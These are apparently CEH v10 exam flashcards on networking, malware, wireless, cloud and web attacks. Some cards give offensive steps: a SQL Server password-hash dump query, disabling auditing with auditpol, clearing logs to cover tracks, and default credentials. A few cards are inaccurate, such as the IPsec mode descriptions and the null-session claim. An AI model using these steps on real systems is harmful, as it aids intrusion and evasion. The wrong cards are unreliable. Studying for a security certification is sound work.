CEH.v10 note cards - complete
Password Grabbing
'+login+'/'+password+'
Block the traffic at the provider level
A protocol-based DDoS attack with at least 10 000 bots sending the traffic from the entire globe can be countered how?
IRDP Spoofing
A routing protocol that allows a host to discover the IP addresses of active routers on its subnet by listening to router advertisement and solicitation messages on its network. an attacker can remotely add default route entries to a remote system
ISM Band
A set of frequencies for the international industrial, scientific, and medical communities
Browser-Based Point of Attack
Phishing Framing Clickjacking Man in the middle mobile Buffer Overflow Data Caching
Crackers
Piece of software or program designed for cracking a code or passwords.
IoT OS : Integrity RTOS
Primarily used in aerospace or defense, ndustrial, automotive and medical sectors.
IoT OS : Nucleus RTOS
Primarily used in aerospace, medical and industrial applications.
DNS SRV Record
Service records -Defines hostname/port of servers
URG, ACK, PSH, RST, SYN, FIN
Six TCP flags?
DoS/DDoS Countermeasure Strategies
- Absorbing the Attack: - Degrading Services: If it is not possible to keep all your services functioning during an attack, it is a good idea to keep at least the critical services functional. - Shutting Down the Services:
Prevent Potential Attacks
- Egress Filtering -Ingress Filtering -TCP Intercept -Rate Limiting
Filtering by Multiple IP Addresses in WireShark
- ip.addr == 10.0.0.1-25
Hping scan mode
-8
FTP port
20/21
Apple Ports
201 - 208
Kerberos port
88
Rule-Based Access Control (RuBAC)
:In this access control, the end point devices such as firewalls verifies the request made to access the network resources against a set of rules. These rules generally include IP addresses, port numbers, etc.
Note:
According to Google's documentation, "you cannot combine a link: search with a regular keyword search."
Types of Wiretapping
Active -a MITM attack. Passive - snooping or eavesdropping.
DNS A record
Address -Points to a host's IP address
Sybil Attack
Attackers uses multiple forged identities to create a strong illusion of traffic congestion, effecting communication between neighboring nodes and networks
Incremental backup
Backups only the data that has changed since the last backup.
DNS CNAME record
Canonical Name -Provides for domain name aliases with your zone -allows aliases to a host
Types of Ciphers
Classical Ciphers -Substitution cipher -Transposition cipher Modern Cipher o Based on key used - Private key - Public key o Based on input -Block cipher -Stream Cipher
Web Server Operations
Components of a Web Server -Document Root -Server Root -Virtual Document Tree -Virtual Hosting -Web Proxy
Cryptography
Converting data into scrambled code for confidentiality. Symmetric uses one key (secret, shared & private). Asymmetric (public key) uses different keys for encryption vs decryption.
Types of Firewall
Hardware Software
Disable Auditing: Auditpol
Immediately after gaining admin priv Enable at logoff (auditpol.exe) pg 209
Browser-Based Point of Attack : Data Caching
In mobile devices this stores information that is often required by mobile devices to interact with web applications, thereby saving scarce resources and resulting in better response time for the client application.
Chosen-plaintext Attack
In this attack, the attacker obtains the ciphertexts corresponding to a set of plaintexts of his own choosing
Protect Secondary Victims
Individual - using anti-malware Network Service Provider -enter dynamic pricing (altering price) for their network usage
rusers
Linux command -displays a list of users who are logged on to remote machines or machines on local network. It displays output similar to who, but for the hosts/systems on the local network.
DNS Enumeration Tools
Nslookup DNSstuff
Interacting with OS
Read/Write System Files from disk Remote shell cmd
Grabbing SQL Svr Hashes
SELECT password FROM master..sysxlogins Hex each hash
Fuzz Testing Tools
WSFuzzer WebScarab Burp Suite AppScan Peach Fuzzer
Wireshark Filters
arp, http, tcp, udp, dns, ip
what is a NetBIOS null session?
logging in without username/password, basically with admin privileges
In ACK flag probe scanning, if the TTL of RST from port 123 is 45 what does it mean
port 123 is open
Child-Monitoring Spyware
spyware that allows you to track and monitor what children are doing on the computer, both online and offline.
Cover Generation Techniques Steganography
the development of digital objects is to cover secret communication.
what is ntptrace
traces the hops an NTP server makes to get its time info from the prime server
Distortion Techniques Steganography
user implements a sequence of modifications to the cover in order to get a stego-object
how does IPSec work?
uses Authentication Headers, Encapsulation Security Payload, and IKE to secure connection between two endpoints
Netbios port
137/139
Zone Transfer
The act of copying a primary name server's zone file
what is SMTP VRFY
validates users
Techniques for Enumeration
Extract user names using email IDs Extract information using default passwords Brute force Active Directory -Microsoft Active Directory is susceptible to a username enumeration at the time of user-supplied input verification. -If a user enables the "logon hours" feature, then all the attempts at service authentication result in different error messages. Extract information using DNS Zone Transfer Extract user groups from Window Extract user names using SNMP
Hash Injection Attack
Inject a compromised hash into a local session and use it to validate network resources. Attacker then finds and extracts a logged domain admin account hash Uses admin account hash to log onto the domain controller. No longer need password if you have hash
Android OS
Software environment developed by Google for mobile devices that includes an operating system, middleware, and key applications. Architecture: o System applications o Java API framework o Native C/C++ Libraries o Android Runtime o Hardware Abstraction layer o Linux Kernel
what is a DSA?
directory system agent, answers LDAP requests
Transform Domain Steganography
hides the information in significant parts of the cover image such as cropping, compression, and some other image processing areas.
IoT Operating Systems
o RIOT OS o ARM mbed OS o RealSense OS X o Nucleus RTOS o Brillo o Contiki o Zephyr o Ubuntu Core o Integrity RTOS o Apache Mynewt
Mobile Trojans
- Ghost push - AndroRAT - Hideicon - Danpay - Rootnik - Idownloader - Flexion - Lotdoor - Gedma - Dowgin - Ztorg - Hummingbad - Hummer
Remote Access Trojans (RAT) Tools
- MoSucker - ProRat - Theef - Ismdoor - Kedi RAT - PCRat/ Gh0st - Paranoid PlugX - Adwind RAT - Netwire - Java RAT - Houdini RAT - DarkComet RAT - Pandora RAT - Xtreme RAT - SpyGate - RAT - njRAT - KilerRat
Virus Hoax Tools
- OSX.Demsty!gen1 - Trojan.Downblocker - Ransom.Defray!gm - Trojan.Smoaler!gm - SONAR.MSOffice!g23 - Zeus Virus Scam
Key escrow
A component of public key infrastructure (PKI) where a copy of a private key is stored to provide third-party access and to facilitate recovery operations
Heuristic/Behavior-Based Detection
-Capable of identifying new, previously unidentified rootkits. -works by identifying deviations in normal operating system patterns or behaviors. -This kind of detection is also known as behavioral detection
Defend Against Rogue DHCP Server Attack
-Enable snooping feature -Set the connection between the interface and the rogue server as untrusted. That action will block all ingress DHCP server messages from that interface. ip dhcp snooping vlan 4,104 -Enable or disable DHCP snooping on one or more VLANs. no ip dhcp snooping information option -To disable the insertion and the removal of the option-82 field, use the no IP dhcp snooping information option in global configuration command. ip dhcp snooping -Enable DHCP snooping option globally. *Note*: All ports in the VLAN are untrusted by defaul
Hping Interface spec
-I
Permissive Policy
-Policy begins wide-open and only the known dangerous services/attacks or behaviors are blocked. -Because only known attacks and exploits are blocked, it is impossible for administrators to keep up with current exploits. . -This policy should be updated regularly to be effective.
Protocols Vulnerable to Sniffing
1. Telnet & Rlogin (23)(513) 2. HTTP (80) 3. POP (110) 4. IMAP (143) 5. SNMP & NNTP (161)(119) 6. FTP (20/21) (all use clear text)
POP3 port
110
NTP port
123
SNMP port
161/162
Nikto
A Open Source (GPL) web server scanner that performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. A web server assessment tool
Rooting Androids using KingRot
A tool used to root android devices. This tool can be used with or without PC. KingoRoot helps users root their Android devices to the following: - Preserve battery life - Access root-only apps - Remove carrier "bloatware" - Customizable appearance - Attain admin level permission
Extension to wired
A user can create an extension of a wired network by placing APs between the wired network and the wireless devices. In this type of network, the AP acts like a switch, providing connectivity for computers that use a wireless network interface card (NIC). The AP can connect wireless clients to a wired LAN, which allows wireless computer access to LAN resources, such as file servers or internet connections
Phone/SMS based Attacks
Baseband attacks SMiShing
A10 Thunder TPS
DDoS Protection Hardware Tools Protection System ensures reliable access to your key network services by detecting and blocking external threats such as DDoS and other cyber-attacks before they escalate into costly service outages. Features: o Custom protection with immediate blocking o Proactive DDoS detection and mitigation o Combined on-premise and cloud-based DDoS protection o Built-in SSL inspection to block encrypted traffic o Inbound reputation-based DDoS protection o Inbound and outbound advanced threat protection
Software as a Service (SaaS)
END CUSTOMERS Offers software to subscribers on demand over the internet
Modes of IPsec
In transport - (also ESP [Encapsulating Security Payload]), IPsec encrypts only the payload of the IP packet, leaving the header untouched. In tunnel - (also AH [Authentication Header]), the IPsec encrypts both the payload and header.
DNS NS record
Name Server -Defines the name servers within your namespace -Points to host's name serv
UDP 137
NetBIOS Name Service -NBNS, also known as Windows Internet Name Service (WINS), provides name resolution service for computers running NetBIOS. -The job of NBNS is to match IP addresses with NetBIOS names and queries. Attackers usually attack the name service first.
FIddler
Session Hijacking Prevention Tool Used for security testing of web applications such as decrypting HTTPS traffic, and manipulating requests using a man-in-the-middle decryption technique.
Drive-by Downloads
The unintentional downloading of software via the Internet. Here, an attacker exploits flaws in browser software to install malware just merely by visiting a website
Launch Daemon
The weak configurations allow an attacker to alter the existing launch daemon's executable to maintain persistence or to escalate privileges.
Risk Matrix
lists an organization's vulnerabilities, with ratings that assess each one in terms of likelihood and impact on business operations, reputation, and other areas.
Bluetooth Threats
o Leaking Calendars and Address Books: o Bugging Devices: o Sending SMS Messages: o Causing Financial Losses: o Remote Control: o Social Engineering: o Malicious Code: o Protocol Vulnerabilities:
Mobile Honeypot Tools
-HosTaGe -Network Guard
IoT OS : Zephyr
It is used in low power and resource constrained devices.
Cloud Provider
A person or organization who acquires and manages the computing infrastructure intended for providing services (directly or via a cloud broker) to interested parties via network access
This probe scanning technique also assists in checking the filtering systems of target networks (firewalls, IDS).
ACK flag
Dynamic Malware Analysis - API Calls Monitoring
API application programming interfaces are parts of the Windows OS that allow external applications to access OS information such as file systems, threads errors, registry, kernel Malware programs make use of these API to access the operating system info and cause damage to the system API Call Monitor
Exploit Kits
Attacker uses malicious script to exploit poorly patched vulnerabilities in an IoT device
Web Server Penetration Testing Tools
CORE Impact® Pro -finds vulnerabilities on an organization's web server. This tool allows a user to evaluate the security posture of a web server using the same techniques employed by today's cyber-criminals Immunity CANVAS Arachni WebSurgery
259
Check Point's FireWall-1 listens to which of the following TCP ports? -259 -1072 -1080 -1745
Footprinting: DNS Interrogation tools
DIg myDNSTools Domain Dossier DNS Data ViewDNSWatch NsLookup
DNS RP record
Responsible Person
Association
The process of connecting a wireless device to an access point
Wireless Antennae
o Directional o Omnidirectional o Parabolic Grid o Yagi o Dipole o Reflector
Electronic warfare:
warfare uses radio electronic and cryptographic techniques to degrade communication. -Radio electronic techniques attack the physical means of sending information, whereas cryptographic techniques use bits and bytes to disrupt the means of sending information
Trojan Horse Construction Kit
-DarkHorse Trojan Virus Make - Trojan Horse Construction Kit - Senna Spy Trojan Generator - Batch Trojan Generator - Umbra Loader - Botnet Trojan Maker
Footprinting Objectives
1. Know the security posture 2. Reduce the focus area 3. Identify vulnerabilities 4. Draw a network map
Phases of Social Engineering
1. Research on Target Company 2. Selecting Target 3. Develop the Relationship 4. Exploit the Relationship
how big is NetBIOS name?
15 characters, 16th is reserved for service/name record type
SSH port
22
File Injection Attack
A technique used to exploit "dynamic file include" mechanisms in web applications. It exploits vulnerable scripts on server to use a remote file instead of trusted file from local file system
Evil Twin
A wireless AP that pretends to be a legitimate AP by imitating another network name. It poses a clear and present danger to wireless users on private and public WLANs. An attacker sets up a rogue AP outside the network perimeter and lures users to sign into the wrong AP. The attacker uses attacking tools such as KARMA, which monitors station probes to create an evil twin.
AirMagnet Planner
A wireless network planning tool that accounts for building materials, obstructions, AP configurations, antenna patterns, and a host of other variables to provide a reliable predictive map of Wi-Fi signal and performance.
Pros and Cons of a Software Firewall
Advantages: o Less expensive than hardware firewalls. o Ideal for personal or home use. o Easier to configure and reconfigure. Disadvantages: o Consumes system resources. o Difficult to un-install firewalls. o Not appropriate for environments requiring faster response times.
Censorship Circumvention Tools
Alkasir -also maps censorship patterns around the world Tails - a live operating system that users can start on any computer from a DVD, USB stick, or SD card
Perform Double Blind SQL Injection—Classical Exploitation (MySQL)
Also called time-based SQL injection In this SQL injection technique, entries are read symbol by symbol. In a typical attack, the functions benchmark() and sleep() are used to process the time delays.
Private Cloud
Also known as internal or corporate cloud, is a cloud infrastructure that a single organization operates solely. o Advantages: -• Enhance security (services are dedicated to a single organization) -• More control over resources (organization is in charge) -• Greater performance (deployed within the firewall, therefore data transfer rates are high) -• Customizable hardware, network, and storage performances organization owns -• Sarbanes Oxley, PCI DSS, and HIPAA compliance data is much easier to attain o Disadvantages: -• Expensive -• On-site maintenance
Jamming Signal
An attack performed on a wireless environment in order to compromise it. During this type of exploitation, overwhelming volumes of malicious traffic result in DoS to authorized users, obstructing legitimate traffic. All wireless networks are prone this
Abuse and Nefarious Use of Cloud services
Attackers create anonymous access to cloud services and perpetrate various attacks such as: password and key cracking building rainbow tables CAPTCHA solving farms launching dynamic attack points hosting exploits on cloud platforms hosting malicious data botnet command or control DDoS
Covering Tracks: Tools
CCleaner DBAN Privacy Eraser Wipe pg 213
Clearing Logs
Clear_Event_Viewer_Logs.bat Meterpreter Shell (if Metasploit was used) pg 209
Types of Rootkits
Hypervisor- loads host OS as virtual machine HW/Firmware- binary injection (not inspected) Kernel- replace OS kernel or device driver codes Boot Loader- replaced Application- replaced binary with Trojan Library- replaced system calls
what is IKE-scan?
IPsec enumeration
Windows Services Monitoring -Dynamic Malware Analysis
Malware spawns Windows services that allow attackers remote control to the victim machine and pass malicious instructions Malware rename their processes to look like a genuine Windows services in order to avoid detection Malware may also employ rootkit techniques to manipulate HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services registry keys to hide its processes Tools - Windows Service Manager to trace malicious services initiated by the malware
what is PRTG network monitor?
NTP management tool
Cisco IPS Source IP Reputation Filtering
Reputation services help in determining if an IP or service is a source of threat or not. The Cisco SensorBase Network contains all the information about known threats on the Internet such as botnets, malware outbreaks, dark nets, and botnet harvesters. The Cisco IPS makes use of this network to filter DoS traffic before it damages critical assets. To detect and prevent malicious activity even earlier, it incorporates the global threat data into its system.
Infrastructure-as-a-Service (IaaS)
SYS ADMINS This cloud computing service enables subscribers to use on demand fundamental IT resources such as computing power, virtualization, data storage, network, and so on. Provides virtual machines and other abstracted hardware and operating systems which may the controlled through a service API
Cydia
Software application for iOS that enables a user to find and install software packages on a jailbroken iPhone, iPod Touch, or iPad
Testing for SQL Injection
String Concatenation o MySQL - ( concat(,) ) o MSSQL - ( + ) o MS Access - ( & ) o Oracle and PostgreSQL - ( || ) o DB2 - All except & Request Union and Sub-request o All Stored Procedure o Oracle, MSSQL and PostgreSQL - Yes o MySQL, MS Access, and DB2 - No String Comments o MySQL - (-) , (/* */) and ( # ) o MSSQL, Oracle and PostgreSQL - (-) and (/*) o MS Access - none o DB2 - (-)
Bandwidth Attack
This attack requires multiple resources to generate a request to overload the target.
IoT Architecture : Edge Technology Layer
This layer consists of all the hardware parts like sensors, RFID tags, readers or other soft sensors and the device itself. These entities are the primary part of the data sensors that are deployed in the field for monitoring or sensing various phenomena. This layer plays an important part in data collection, connecting devices within the network and with the server.
IoT Architecture : Access Gateway Layer
This layer helps to bridge the gap between two end points like a device and a client. The very first data handling also takes place in this layer. It carries out message routing, message identification and subscribing.
True
True or False? You will not be able to complete the three-way handshake and open a successful TCP connection with spoofed IP addresses.
Cluster Viruses
Virus infect files without changing the file or planting additional files. They save the virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk read point to the virus code instead of the actual program. Modify directory table entries so that it points users or system processes to the virus code instead of the actual program One copy of the virus on the disk infecting all the programs in the computer system It will launch itself first when any program on the computer system is started and then the control is passed to actual program
Attack Area : Device physical interfaces
Vulnerability present it this competent are Firmware Extraction, User CLI (command-line interface), Admin CLI, Privilege Escalation, Reset to Insecure State and Removal of Storage Media
Attack Area : Device Firmware
Vulnerability present it this competent are Hardcoded Credentials, Sensitive Information/URL Disclosure , Encryption Keys and Firmware Version Display and/or Last Update Date
Attack Area : Ecosystem Communication
Vulnerability present it this competent are Health Checks, Heartbeats V, Ecosystem Commands, De-provisioning and Pushing Updates
RFC 793
Which RST/ACK packet is generated for restting the TCP connection and doesn't work on Microsoft systems with the XMAS scan?
Manually Clearing Event Logs
Windows- Start>Control Panel>System and Security>Administrative Tools>Event Viewer Linux- /var/log/messages pg 210
IoT Attack Surface Areas
o Device memory o Ecosystem access control o Device physical interfaces o Device web interface o Device firmware o Device network services o Administrative interface o Local data storage o Cloud web interface o Update mechanism o Third party backend APIs o Mobile application o Vendor backend APIs o Ecosystem communication o Network traffic
IoT Hacking Tool
o Firmalyzer o ChipWhisperer o rfcat-rolljam o KillerBee o GATTack.io o JTAGULATOR® o Firmware Analysis Toolkit
Bluetooth Security Tools
o FruitMobile Bluetooth Firewall -protects your android device against all sorts of bluetooth attack from devices around you. It displays alerts when bluetooth activities occur. o Bluediving o Bluelog o Blooover II o Btscanner o BlueRange
Cross-Site Request Forgery countermeasures
o Logoff immediately after using a web application and clear the history o Do not allow your browser and websites to save login details o Check the HTTP Referrer header and when processing a POST, ignore URL parameters
Crptography Tools : MD5 Hash Calculators
o MD5 Calculator - allows to calculate the MD5 hash value of the selected file. o HashMyFiles - is small utility that allows to calculate the MD5 and SHA1 hashes of one or more files in the system. o HashCalc o Hash Calculator o HashTool o OnlineMD5.com o MD5 Hash generator
How to Detect Rogue AP
o RF Scanning: Re-purposed access points that do only packet capturing and analysis (RF sensors) are plugged in all over the wired network to detect and warn the WLAN administrator about any wireless devices operating in the area. o AP Scanning: Access points that have the functionality of detecting neighboring APs operating in the nearby area will expose the data through its MIBS and web interface. o Using Wired Side Inputs: Network management software uses this technique to detect rogue APs. This software detects devices connected in the LAN, including Telnet, SNMP, CDP (Cisco discovery protocol) using multiple protocols
Common Targets of Social Engineering
o Receptionists and Help-Desk Personnel: o Technical Support Executives o System Administrators o Users and Clients o Vendors of the target Organization
Defend Against Rootkits
o Reinstall OS/applications from a trusted source after backing up the critical data o Well-documented automated installation procedures need to be kept o Perform kernel memory dump analysis to determine the presence of rootkits o Harden the workstation or server against the attack o Educate staff not to download any files/programs from untrusted sources o Install network and host-based firewalls and check frequent updates o Ensure the availability of trusted restoration media
Web Services Architecture
o SOAP: SOAP (Simple Object Access Protocol) is an XML-based protocol that allows applications running on a platform (e.g. Windows Server 2012) to communicate with applications running on a different platform (e.g. Ubuntu) o UDDI: Universal Description, Discovery, and Integration (UDDI) is a directory service that lists all the services available. o WSDL: Web Services Description Language is an XML-based language that describes and traces web services. o WS-Security: WS-Security plays an important role in securing the web services. WS-Security (Web Services Security) is an extension to SOAP and aims at maintaining the integrity and confidentiality of SOAP messages and authenticating the us
Cloud Computing Attacks
o Service Hijacking using Social Engineering Attacks o Service Hijacking using Network Sniffing o Session Hijacking using XSS o Session Hijacking using Session Riding o Domain Name System Attacks o Side Channel Attacks or Cross-guest VM Breaches o SQL Injection Attacks o Cryptanalysis Attacks o Wrapping Attack o DoS and DDoS Attacks o Man in the Cloud attack
Types of Application level hijacking / Ways session tokens are compromised
o Session sniffing o Predictable session token o Man-in-the-middle attack o Man-in-the-browser attack o Cross-site scripting (XSS) attack o Cross-site request forgery attack o Session replay attack o Session fixation attack o CRIME attack o Forbidden attack
Why are Web Applications Vulnerable to SQL Injection Attacks?
o The database server runs OS commands o They are using privileged account to connect to the database o They have error message revealing important information o No data validation at the server o To much privilege o Implementing Consistent Coding Standards o Not Firewalling the SQL Server
Android Rooting Tool
o TunesGo—This tool has an advanced android root module that recognizes and analyzes your Android device and chooses the appropriate Android-root-plan for it automatically o One Click Root is Android rooting software that supports the most devices and comes with extra fail-safes (like instant unrooting) feature and offers full technical support. o Unrevoked o MTK Droid o Superboot o Superuser X [Root] o Root Uninstaller o Root Browser File Manager o Titanium Backup Root
Techniques used to Crack WPA Encryption
o WPA PSK (Pre-Shared Key) -dictionary attack will compromise most consumer passwords o Offline Attack o De-authentication Attack o Brute Force WPA Keys
Wi-Fi Chalking Techniques
o WarWalking: Attackers walk around with Wi-Fi enabled laptops to detect open wireless networks. o WarChalking: A method used to draw symbols in public places to advertise open Wi-Fi networks. o WarFlying: Attackers use drones to detect open wireless networks. o WarDriving: Attackers drive around with Wi-Fi enabled laptops to detect open wireless networks.
Wireless Hacking Methodology
o Wi-Fi Discovery o GPS Mapping o Wireless Traffic Analysis o Launch Wireless Attacks o Crack Wi-Fi Encryption o Compromise the Wi-Fi Network
Wi-Fi Security Tools for Mobile
o Wifi Protector -detects and protects cell phones from all kinds of ARP attacks, such as DOS or MITM. o WiFiGurad - can work on both Root and Non-root devices o Wifi Inspector - finds all the devices connected to the network (both wired and Wi-Fi, whether consoles, TVs, pcs, tablets, phones, etc.), giving relevant data such as IP address, manufacturer, device name, and MAC Address.
The Network point of attack
o Wifi weak encryption/ no encryption o Rogue access points o Packet sniffing o Man in the middle o Session hijacking o DNS poisoning o SSLStrip o Fake SSL Certificates
Wi-Fi Vulnerability Scanning Tools
o Zenmap - a multi-platform GUI for the Nmap Security Scanner, which is useful for scanning vulnerabilities on wireless networks. o Nessus o Network Security Toolkit o Nexpose o WiFish Finder o Penetrator Vulnerability Scanner o SILICA o WebSploit o Airbase-ng
Health Insurance Portability and Accountability Act (HIPAA)
provides federal protections for individually identifiable health information held by covered entities and their business associates and gives patients an array of rights with respect to that information
Boot loader level rootkit
rootkits function either by replacing or modifying the legitimate bootloader with another one can activate even before the operating system starts. So, they are serious threats to security because they can help in hacking encryption keys and passwords. Also known as bootkit
nbtstat -A [IP addr]
uses IP address to display NetBIOS cache of remote machine
Dynamic Malware Analysis- Registry Monitoring
stores OS and program configuration details, such as settings and options Malware uses the this to perform harmful activity continuously by storing entries into the registry and ensuring that the malicious program runs whenever the computer or device boots automatically Tools - jv16 Power Tools 2017 to examine the changes made to the system's registry by malware
PhishTank
collaborative clearinghouse for data and information about phishing on the Internet. It provides an open API for developers and researchers to integrate anti-phishing data into their applications.
Information obtained in foortptinting
collecting the network information, system information, and the organizational information of the target.
Economic Warfare
economic information warfare can affect the economy of a business or nation by blocking the flow of information.
nbtstat -a [remote name]
get the NetBIOS name table of remote computer using hostname
Piggybacking
implies entry into the building or security area with the consent of the authorized person
Multiple input, Multiple output (MIMO-OFDM)
influences the spectral efficiency of 4G and 5G wireless communication services. Reduces the interference and increases how robust the channel is.
Pretexting
is the use of a fictitious scenario to persuade someone to perform an action or give information for which they are not authorized.
Triple Data Encryption Standard (3DES)
it does DES three times with three different keys. 3DES uses a "key bundle" which comprises three DES keys, K1, K2, and K3 DES encrypt with K1, DES decrypt with K2, then DES encrypt with K3 Each key is standard 56-bit DES key
Hping UDP mode
-2
Detect Sniffing
-Check Promiscuous mode - IDS and Network tools- to monitors the network for strange packets such as packets with spoofed addresses. -Reverse DNS Lookup
Wired Equivalent Privacy (WEP) Flaws
-WEP is a stream cipher that uses RC-4 to produce a stream of bytes that are XORed with plaintext - No defined method for encryption key distribution -RC4 was designed to be used in a more randomized environment than WEP utilized:
Detection Techniques
1. Activity Profiling 2. Wavelet Analysis 3. Sequential change point detection
Covering Tracks
1. Disable Auditing 2. Clearing Logs 3. Manipulating Logs pg 208
Factors that Make Companies Vulnerable to Attacks
o Insufficient Security Training o Unregulated Access to the Information o Several Organizational Units o Lack of Security Policies
Attackers use LDAP to Achieve
o Login bypass o Information disclosure o Privilege escalation o Information alteration
Long-range Wireless communication
o Low-power Wide-area Networking LPWAN o Very small aperture terminal VSAT o Cellular
Types of Impersonation (Vishing)
o Over-Helpfulness of Help Desk o Tech Support o Third-party Authorization o Trusted Authority Figures
Three Phases of Cloud Pentesting
o Preparation: It consists in signing formal agreements to ensure the protection of both parties (Cloud Service Provider [CSP] and client). It defines the policy and course of action the CSP and client should take in finding potential vulnerabilities and their mitigation. Pen testing also considers other users who might be using the same infrastructure under testing. o Execution: It involves executing the cloud pen-testing plan to find out potential vulnerabilities, if any, existing in the cloud. o Delivery: Once cloud pen testing is complete, document all the exploits/vulnerabilities, and hand over the document to the provider to take necessary action.
Types of Mobile-Based Social Engineering
o Publishing malicious apps o Repackaging legitimate apps o Sending fake security applications o SMiShing (SMS Phishing)
Active footprinting techniques
o Querying published name servers of the target o Extracting metadata of published documents and files o Gathering website information using web spidering and mirroring tools o Gathering information through email tracking o Performing Whois lookup o Extracting DNS information o Performing traceroute analysis o Performing social engineering
Symmetric encryption algorithms, developed by RSA Security
o RC4 - Symmetric key stream cipher o RC5 - Parameterized algorithm with variable block sizes o RC6 - Symmetric key block cipher that uses integer multiplication & 4-bit working registers
Vuln Assessment Tools: Mobile
o Retina CS for Mobile o SecurityMetrics Mobile o Nessus o IP Tools o Network Scanner
SQL Injection Tools
o SQL Power Injector o sqlmap o Mole o jSQL injection
Detecting Layer 2 Tar Pits
An attacker can also identify the presence of these tar pits by analyzing the ARP responses.
More DoS/DDoS Protection Hardware Tool
Arbor Networks APS Herculon DDoS Hybrid FortGuard DDoS Protection System F200 Series D-Guard DDoS Protection System
WI-Fi Prevention System
o WatchGuard WIPS o Enterasys IPS o AirMagnet Enterprise o SONICWALL SONICPOINT N2 o SonicPoint Wireless Security Access Point Series o HP TippingPoint NX Platform NGIPS o AirTight WIPS o Network Box IDP o ZENworks® Endpoint Security Management o FortiGate next-generation firewalls
Sniffing Tools
o Z-Wave sniffer o CloudShark o Ubiqua Protocol Analyzer o Perytons Protocol Analyzers o Wireshark o Tcpdump o Open Sniffer o APIMOTE IEEE 802.15.4/ZIGBEE SNIFFING HARDWARE o Ubertooth
Data Breach/ Loss
Data is erased, modified or decoupled Encryption keys are lost, misplaced or stolen
Email Footprinting Tools
Destination tracking to pinpoint social engineering vectors. Intercepting or copying email headers give you this and more. Websites: -emailtrackerpro - analyzes email headers and reveals information such as sender's geographical location, IP address and so on -mailtracking.com -GetNotify, -ContactMonkey, - Yesware, -Read Notify, -WhoReadMe, -MSGTAG, - Trace Email, -Zendio
Evasion Technique: Case Variation
Due to the case-insensitive option of regular expression signatures in the filters, attackers can mix uppercase and lowercase letters in an attack vector to bypass detection mechanism.
DNS HINFO
Host information record -includes CPU type and OS
port 80 is open
In an ACK flag probe all TTLs are 50, but one window size is 512 for port 80 what does it mean?
Information Gathering Stage
In this stage, attackers try to gather information about the target database such as database name, version, users, output mechanism, DB type, user privilege level, and OS interaction level. 1. Identifying Data Entry Paths - analyze GET and POST requests -Tools- Tamper Data, Burp Suite 2. Extracting Info via Error Messages
Insecure Interfaces and APIs
Insecure interfaces APIs risks: circumvents user defined policies is not credential leak proof breach in logging and monitoring facilities unknown API dependencies reusable passwords/tokens insufficient input-data validation
Session Splicing
It is a network-level evasion method used to bypass IDS where an attacker splits the attack traffic in too many packets such that no single packet triggers the IDS.
IoT OS : ARM mbed OS
It is mostly used for low-powered devices like wearable devices.
Malware
Malicious software that damages or disables computer systems and gives limited or full control of the systems to its creator for theft or fraud. Includes Trojan horse, Backdoor, Rootkit, Ransomware, Adware, Virus, Worms, Spyware, Botnet and Crypter
Session hijacking Tools:
OWASP ZAP BetterCAP netool toolkit WebSploit Framework sslstrip JHijack Ettercap Cookie Cadger CookieCatcher hamster Burp Suite
EquationDrug
Root Kit Tool A dangerous computer rootkit that attacks the Windows platform. It allows a remote attacker to execute shell commands on the infected system.
Components of IoT : Cloud Server/Data Storage:
The collected data after travelling through the gateway arrives at the cloud, where it is stored and undergoes data analysis. The processed data is then transmitted to the user where he/she takes certain action based on the information received by him/her.
Government Access to Keys (GAK)
The government promise of secure key storage, the only stated exception being a warrant Refers to statutory obligation of individuals and organizations to disclose their cryptographic keys to government agencies.
IoT Architecture : Internet Layer
This is the crucial layer as it serves as the main component in carrying out the communication between two end points such as device-to-device, device-to-cloud, device-to-gateway and back-end data-sharing
link:
This operator searches websites or pages that contain links to the specified website or page. [link:www.googleguide.com] finds pages that point to Google Guide's home page.
ACK flag probe
This probe scan is better with older OS and BSD TCP/IP stacks
Packet Analysis of a Local Session Hijack
To conduct a session hijacking attack, the attacker performs three activities: - Track a session - Desynchronizes session - Injects attacker's commands in between
E-banking Trojan Tools
Tools - Gozi / Ursnif - Emotet - Ramnit - Gootkit - Tinba - Bebloh - Snifula - GozNym - Neverquest - Rovnix - Trickbo - Zeus
IDS/Firewall Evasion Tools
Traffic IQ Professional Hotspot Shield FTester Snare Agent for Windows Tomahawk Atelier Web Firewall Tester Freenet Your Freedom Proxifier VPN One Click Iodine
SNMP: Trap
Used by the SNMP agent to inform the pre-configured SNMP manager of a certain event.
Spectrum Analysis
Used to discover the presence of wireless networks. Employ statistical analysis to plot spectral usage, quantify "air quality," and isolate transmission sources. Ekahau -an easy to use USB device for interference analysis
Audit
Which of the following is not an action present in Snort IDS? -Pass -Log -Audit -Alert
extract the user names and passwords from the text file
[file: credentials.txt] administrator "" administrator password administrator administrator [Etc.]
Certification Authority (CA)
a trusted third party that issues digital certificates
Linux way of tracing packets
traceroute -4, -6: force ipv4/ipv6 tracerouting -I: ICMP ECHO for probes -T: TCP SYN for probes -F: do not fragment packets -m: max hops -P: raw packet with set protocol -n: prevents IP mapping to hostnames
Security Software Disabler Trojan
trojans stop the working of security programs such as firewall, IDS, either by disabling them or killing the process These are entry Trojans which allow an attacker to perform the next level of attack on the targeted system Tools - CertLock and GhostHook
NetBIOS code: 03
unique, messenger service running on that computer or for the logged-in user
Wiretapping Methods
- The official tapping of telephone lines - The unofficial tapping of telephone lines - Recording the conversation - Direct line wiretap - Radio wiretap
Limitations of Vulnerability Assessment
- Vulnerability-scanning software is limited in its ability to detect vulnerabilities at a given point in time. - Vulnerability-scanning software must be updated when new vulnerabilities are discovered or improvements are made to the software being used. - Software is only as effective as the maintenance performed on it by the software vendor and by the administrator who uses it. - It does not measure the strength of security controls. - Vulnerability-scanning software itself is not immune to software engineering flaws that might lead to missing serious vulnerabilities.
Filtering by IP Address in WireShark
- ip.addr == 10.0.0.4
Source or Destination in Wireshark
- ip.src==205.153.63.30 or ip.dst==205.153.63.30
Dos Attack countermeasure
- protect secondary victims - detect and neutralize the handler - enable ingress and egress filtering - deflect attack by diverting it to the honeypot - mitigate attacks by load balancing - disable unnecessary services - using anti-malware - enable router throttling - using a reverse proxy - IDS
Confidentiality Agreement and Non-Disclosure Agreement (NDA)
--states that the information provided by the target organization is confidential and proprietary.
Hping listen mode
-9
What are the two security services used by IPSEC?
-Authentication Header (AH) -Encapsulation Security Payload (ESP):
Defend Against DNS Spoofing
